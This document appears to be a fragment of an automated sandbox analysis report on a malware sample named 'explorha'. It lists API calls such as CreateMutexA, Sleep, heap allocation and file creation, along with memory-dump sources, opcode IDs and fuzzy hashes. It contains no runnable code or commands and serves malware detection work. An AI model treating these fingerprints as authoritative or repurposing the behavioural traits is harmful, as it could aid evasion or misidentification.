                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32c998c739a01c78574ad87f075159b21fd84cc1c58a0e0b6e8500516d3523e9
                                                                                                      • Instruction ID: bb9c29d096a7390bdf72187360b1829edddd40dff1e8d727a993d0483d62f1df
                                                                                                      • Opcode Fuzzy Hash: 32c998c739a01c78574ad87f075159b21fd84cc1c58a0e0b6e8500516d3523e9
                                                                                                      • Instruction Fuzzy Hash: 6421C47190150AFAEF11BBA88C42B9E3769FF43338F184250F924AB1C1DE706E0596A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 72e078d3d8ed42656cb2fe91cdb362345b1fd5630db6fb0f7a569ae31763605b
                                                                                                      • Instruction ID: 627bf44b438657d127e0c52113cc6c0b6435896699ef7885f8cc737a2eeed772
                                                                                                      • Opcode Fuzzy Hash: 72e078d3d8ed42656cb2fe91cdb362345b1fd5630db6fb0f7a569ae31763605b
                                                                                                      • Instruction Fuzzy Hash: C3D05E202D9600EAF604739C5C8DF392168E795705F251829A708894C189A071844A22
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00867FF4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721193555-0
                                                                                                      • Opcode ID: 9ee52104cf3fdcb9f3a298a951feffd49ca20fcf929181d0b4099a1c6f7bbe54
                                                                                                      • Instruction ID: c75afe750ad3125593429053e0017106407a5666f6b4e6464280ef690d681fcf
                                                                                                      • Opcode Fuzzy Hash: 9ee52104cf3fdcb9f3a298a951feffd49ca20fcf929181d0b4099a1c6f7bbe54
                                                                                                      • Instruction Fuzzy Hash: 6B512471904608DBEB24EB68CD45BDEB774FB45314F5042A8E818E72C2EF359AC48B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00898608,?,?,00000000,00000000), ref: 00898713
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Time$LocalSpecificSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2574697306-0
                                                                                                      • Opcode ID: 2f27d293e4b4710fcbb5d92517f8e3bf1f1f334001199940f7c02829105a377c
                                                                                                      • Instruction ID: 5241df99370c3eac3b9bb4a0be1f0955a9f4cba4638d7744e9ae7952e8d0d640
                                                                                                      • Opcode Fuzzy Hash: 2f27d293e4b4710fcbb5d92517f8e3bf1f1f334001199940f7c02829105a377c
                                                                                                      • Instruction Fuzzy Hash: 3911067290020DEADF01EEE5C884EDF77BDEB49310F245266E512E6180EA30EA448BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __wsopen_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 3347428461-0
                                                                                                      • Opcode ID: fa9e4f84c2537954528a7645091c7efd21ace892919fe0ec2aacfaf9fb8453fe
                                                                                                      • Instruction ID: 166cec2397ffe661faa204d7df2329e35f6b7b8b861c3336c8a142be7e94ca3b
                                                                                                      • Opcode Fuzzy Hash: fa9e4f84c2537954528a7645091c7efd21ace892919fe0ec2aacfaf9fb8453fe
                                                                                                      • Instruction Fuzzy Hash: 14111271A0420AAFCF05DF99E94199B7BF8FF49304F0540A9F809EB252D631EE15CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0089BE33,00000001,00000364,00000006,000000FF,?,?,0087EA91,00878247,?,0087911B,8B18EC84), ref: 0089EE91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: dad3d853db0350deed41d9f7c529d4c4ec845a329882c8c9323baa93be3dd448
                                                                                                      • Instruction ID: 4ba5df6ae60570d690653c069e1429baf3255095ee7701a90760bbdb86936bcc
                                                                                                      • Opcode Fuzzy Hash: dad3d853db0350deed41d9f7c529d4c4ec845a329882c8c9323baa93be3dd448
                                                                                                      • Instruction Fuzzy Hash: BFF08232545229A69F21FAA69C05B6F7F99FF82770B1D8112BC18E6181CF71E80186E5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00878247,?,?,0087EA91,00878247,?,0087911B,8B18EC84,04980A5A), ref: 0089C69E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 3d7fdf02d2fca9a62cca83cc5a211b39f679b3a131ac3154a6de4f542b5bf28b
                                                                                                      • Instruction ID: d9acb89938cb7cccaf0a2e4037f7a8927685d460493965c9bda44c8c9d2c8809
                                                                                                      • Opcode Fuzzy Hash: 3d7fdf02d2fca9a62cca83cc5a211b39f679b3a131ac3154a6de4f542b5bf28b
                                                                                                      • Instruction Fuzzy Hash: 0BE09B361052265AEE6336655C01B6B7688FF673B0F2E2119EC04D6180DF62CC0145F5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,008A3185,?,?,00000000,?,008A3185,00000000,0000000C), ref: 008A2DB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 93c85f58b70de8ec455d9845cfbee8ec7a0c920cab12aafc849feb73dd30bf1d
                                                                                                      • Instruction ID: 75e24a28cea11bb5138d1a62cd305b14454e9e9a209d596449f16437856072e0
                                                                                                      • Opcode Fuzzy Hash: 93c85f58b70de8ec455d9845cfbee8ec7a0c920cab12aafc849feb73dd30bf1d
                                                                                                      • Instruction Fuzzy Hash: 65D0923204010DBBDF129E84DC02EDA3BAAFB88714F014150BE5866020C732F831EB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: 1225d9bf3e828a6aa5f92beb3a698e5361f317442c542f220093ad5dcd8d21ad
                                                                                                      • Instruction ID: 1330efbc66475bd775bb3f4edfb56755bdf4aa4c965144ff6f96f5bb26446d9b
                                                                                                      • Opcode Fuzzy Hash: 1225d9bf3e828a6aa5f92beb3a698e5361f317442c542f220093ad5dcd8d21ad
                                                                                                      • Instruction Fuzzy Hash: 01F0AD31A00904ABC601BB7C9D17B0E7BB4FB12760F800258E825AB2D1DA35990487D3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cf521dbad8e17fb8351d090990cb9ad7640762bc2bcecea9c64ec58fc9461261
                                                                                                      • Instruction ID: 435a73a69729bff070d9d148830e7bee2d722c013844bec28bca900f9bb5d98e
                                                                                                      • Opcode Fuzzy Hash: cf521dbad8e17fb8351d090990cb9ad7640762bc2bcecea9c64ec58fc9461261
                                                                                                      • Instruction Fuzzy Hash: DBF0E19774A211EE9302417949901F97B9F6A970307340877E107CB647E55065167332
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a321c683fbf43e819aa4b56f8154842f211460367305074b95fd5d4cefe65cc6
                                                                                                      • Instruction ID: f27bfbd895af6afc66504cd81c035dfce5939ab0e0b9d4ff0e5f26172f37b6f3
                                                                                                      • Opcode Fuzzy Hash: a321c683fbf43e819aa4b56f8154842f211460367305074b95fd5d4cefe65cc6
                                                                                                      • Instruction Fuzzy Hash: 42F024A3309200BE4202859859804B57BAFA6972717304C31B207CB207F5A47A12B331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0dbe1cf6a040cc73e745abeff89c6ff8cb25fd12d0b31adf117b68029733e75a
                                                                                                      • Instruction ID: cd64784293cd4baf630cee529ac977dc2c7d8f923082a6f3d7735fb944e6ac86
                                                                                                      • Opcode Fuzzy Hash: 0dbe1cf6a040cc73e745abeff89c6ff8cb25fd12d0b31adf117b68029733e75a
                                                                                                      • Instruction Fuzzy Hash: 82F0E5A730A205FE520285989E00576BBAFA69B270B308C32F207CB247F5A03D51B331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 934b2693bcdaa3006c23cabeb816c52b9288001807d8f9b7c2293df6890d66a0
                                                                                                      • Instruction ID: bd7f8dfe9b84d6fdb908db1cfb59b5b0f6af5eb74312afd1281afd56c4abadb3
                                                                                                      • Opcode Fuzzy Hash: 934b2693bcdaa3006c23cabeb816c52b9288001807d8f9b7c2293df6890d66a0
                                                                                                      • Instruction Fuzzy Hash: 1FF0E5AB30D200FE520295D469005B5ABAFAA976713304C76F207CB607F5A43951B331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed422821b1d3afdbf0404afc8cf1a9e9b5967ff0eb308e366389f1bbb48ca862
                                                                                                      • Instruction ID: 1403ba2e6f7e685ac8c7b70d0279661ad55778a2b07cd3e276feef88c9249487
                                                                                                      • Opcode Fuzzy Hash: ed422821b1d3afdbf0404afc8cf1a9e9b5967ff0eb308e366389f1bbb48ca862
                                                                                                      • Instruction Fuzzy Hash: EBE026CB3541107CA14785D956048B5EA6FA7A733473485726142C6983E5D82AA82331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008825A6
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008825F2
                                                                                                        • Part of subcall function 00883CED: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00883DE0
                                                                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 0088265E
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0088267A
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008826CE
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008826FB
                                                                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00882751
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                      • String ID: (
                                                                                                      • API String ID: 2943730970-3887548279
                                                                                                      • Opcode ID: abd26d59c194d9d2eb213d3fdaff377cb3024cf118292cc080b73f1a2cfe9592
                                                                                                      • Instruction ID: 8a4fe2a5ff21edcb22489ad587e97327b05032d8d762897f8574fbfa7c7e82aa
                                                                                                      • Opcode Fuzzy Hash: abd26d59c194d9d2eb213d3fdaff377cb3024cf118292cc080b73f1a2cfe9592
                                                                                                      • Instruction Fuzzy Hash: 33B15B70A00615EFDB19EF59D980A7EB7B5FB48300F14856DE806EB641D730AE41CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 0088438C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 0088439F
                                                                                                      • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00882CA4
                                                                                                        • Part of subcall function 0088449F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 008844C9
                                                                                                        • Part of subcall function 0088449F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00884538
                                                                                                      • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00882DD6
                                                                                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00882E36
                                                                                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00882E42
                                                                                                      • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00882E7D
                                                                                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00882E9E
                                                                                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00882EAA
                                                                                                      • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00882EB3
                                                                                                      • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00882ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                      • String ID:
                                                                                                      • API String ID: 2508902052-0
                                                                                                      • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                      • Instruction ID: 87e4844398d5221a33fd7fda2d539b6adad52d239c1c8445efa1fd3ac71a15b8
                                                                                                      • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                      • Instruction Fuzzy Hash: 03815D71E006299FCB18EFA8C584A6DBBF2FF48304B1546ADD845EB706C770AD52CB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00890311
                                                                                                        • Part of subcall function 0088A5BF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0088A5E0
                                                                                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00890377
                                                                                                      • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0089038F
                                                                                                      • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0089039C
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0088FE67
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0088FEFF
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0088FF09
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::location::_Assign.LIBCMT ref: 0088FF3D
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0088FF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                      • String ID:
                                                                                                      • API String ID: 2363638799-0
                                                                                                      • Opcode ID: ce4a94cec0fbe43f33c9064a09becc2de2cc03ae9a9581fc80a8d42be792b349
                                                                                                      • Instruction ID: 0e21190837cc70d94cb4a478eb124e6012ee1e5ba0e10ded7d2d4a908abb01d3
                                                                                                      • Opcode Fuzzy Hash: ce4a94cec0fbe43f33c9064a09becc2de2cc03ae9a9581fc80a8d42be792b349
                                                                                                      • Instruction Fuzzy Hash: 71516E31A002059FCF18EF54C895BAEB775FF44714F1841A9A906AB392CB71AE05DFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • NtFlushProcessWriteBuffers.NTDLL ref: 0087E23A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BuffersFlushProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 2982998374-0
                                                                                                      • Opcode ID: 39e28e64aa2bec64aeed2e2213f8df8d03e3a24c794e9d6b8ab4d481b7132957
                                                                                                      • Instruction ID: c9f19b0ab1122dc10c672d3fe5b634be7398c3dc4c68310258818e14822a9808
                                                                                                      • Opcode Fuzzy Hash: 39e28e64aa2bec64aeed2e2213f8df8d03e3a24c794e9d6b8ab4d481b7132957
                                                                                                      • Instruction Fuzzy Hash: D6B09232A264304789152B58BC0499DB728BA44B1130A41A6E805E72288A206D424FE4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79ddefa735feea7d94bf25e888cccab6900cbc941264d7186bfc52ca0fcb4588
                                                                                                      • Instruction ID: 14bd9cbd0ef0fd6bff5b81e4d8f6e144906e5b86a9d5c867d7f8f10b3ff5b52e
                                                                                                      • Opcode Fuzzy Hash: 79ddefa735feea7d94bf25e888cccab6900cbc941264d7186bfc52ca0fcb4588
                                                                                                      • Instruction Fuzzy Hash: 47519DB1E056158FDB25CF5AE881BAABBF0FB48310F24C56AD609EB295D378D940CF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2a9fce8fbab03e4ae987efc573ff7ef101b772d0cb633d4636b813efc6f48839
                                                                                                      • Instruction ID: b47f7c16a128bdb18091c8480fa0a50959c7ce593720d546fc1faf901b244698
                                                                                                      • Opcode Fuzzy Hash: 2a9fce8fbab03e4ae987efc573ff7ef101b772d0cb633d4636b813efc6f48839
                                                                                                      • Instruction Fuzzy Hash: BE01F1EB24C0607C711682856E589F72B6EE8C2730332CC7FF546C5413F2895A4FA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00893D70
                                                                                                        • Part of subcall function 00893B6E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00893B91
                                                                                                      • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00893D91
                                                                                                      • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00893D9E
                                                                                                      • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00893DEC
                                                                                                      • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00893E73
                                                                                                      • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00893E86
                                                                                                      • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00893ED3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
